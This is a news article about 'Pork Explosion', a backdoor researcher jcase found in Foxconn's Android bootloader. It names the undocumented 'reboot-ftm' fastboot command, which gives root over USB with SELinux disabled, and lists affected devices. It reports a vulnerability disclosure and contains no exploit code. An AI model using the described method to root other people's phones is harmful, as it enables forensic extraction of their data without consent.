Android has always been considered one of the hottest playgrounds for gaping security holes and vulnerability issues over the past years. Though Google has been continuously trying to patch up all reported security flaws, yet another serious vulnerability has now popped up for some smartphones. This flaw compromises some important security measures and leaves the device open to various types of attacks.
The discovery of this highly vulnerable security flaw was put forth by security expert Jon Sawyer — who goes by the psuedonym of Justin Case or prominently jcase. The vulnerability, christened Pork Explosion, has been discovered in the apps bootloader provided by hardware manufacturer Foxconn Technologies. Yes, the unfortunate news about this flaw is that it isn’t Android-specific and has likely been intentionally introduced by the hardware manufacturer. And the manufacturers are probably still unaware of the placement of this backdoor in their devices.
To add to your knowledge, Foxconn is one of the largest hardware manufacturers out there and is dominantly known for its partnership with Apple for the development of iPhones. But, it is also the primary manufacturer for quite a lot of Android OEMs including LG, Sony, and Samsung as well. Some of these manufacturers choose to allow Foxconn to build low-level firmware for their devices and that’s where the immediate problem lies.
jcase has discovered that Foxconn has planted a backdoor in the app bootloader which can easily be used by anyone to gain root access to the Android device. The device, with elevated privileges and minimized security, could easily use the same for forensic data extraction, brute forcing encryption keys, or unlocking the boot loader of a device without resetting user data.
Once a hacker gains access to the root shell on your encrypted device, they could easily use the vulnerable bootloader to execute certain commands, which are of two types — normal and OEM. Normal commands, like reboot, getvar, etc. are hard-coded into the fastboot client and can only be sent over usb; whereas OEM commands are non-standard commands are implemented by device manufacturers. But, why are we discussing this?
Well, because the command ‘reboot-ftm’ that intrigued jcase was neither a normal command nor an OEM one. He was not only unable to preface this command using ‘oem’ but also found that it couldn’t be sent to the fastboot client as normal commands. For accessing this command, one would need to create a custom client which connects to the device and sends the ‘reboot-ftm’ command to the bootloader.
This issues a command for the phone to reboot into factory test mode, which is a full compromise over usb. And if the ‘adb daemon’ service is running as root, the hacker doesn’t require any additonal authorization to bypass the device when connected to an unknown computer. In this state, SELinux is also not permissive and is in completely disabled state.
Two of the devices, manufactured by Foxconn, that jcase found were vulnerable to the security loophole includes Nextbit Robin and Infocus. He has already contacted the smartphone manufacturers, including Foxconn for a fix on the problem. The team at Nextbit has already taken prompt actions to mitigate the vulnerability, while there is still no update from the hardware manufacturer.
Ultimately, jcase also continues to add that this could be a debugging feature added by Foxconn, it can also act as a backdoor for hackers in modern devices. Thus, the company should gear up and lay immense focus on capping the vulnerability as soon as possible.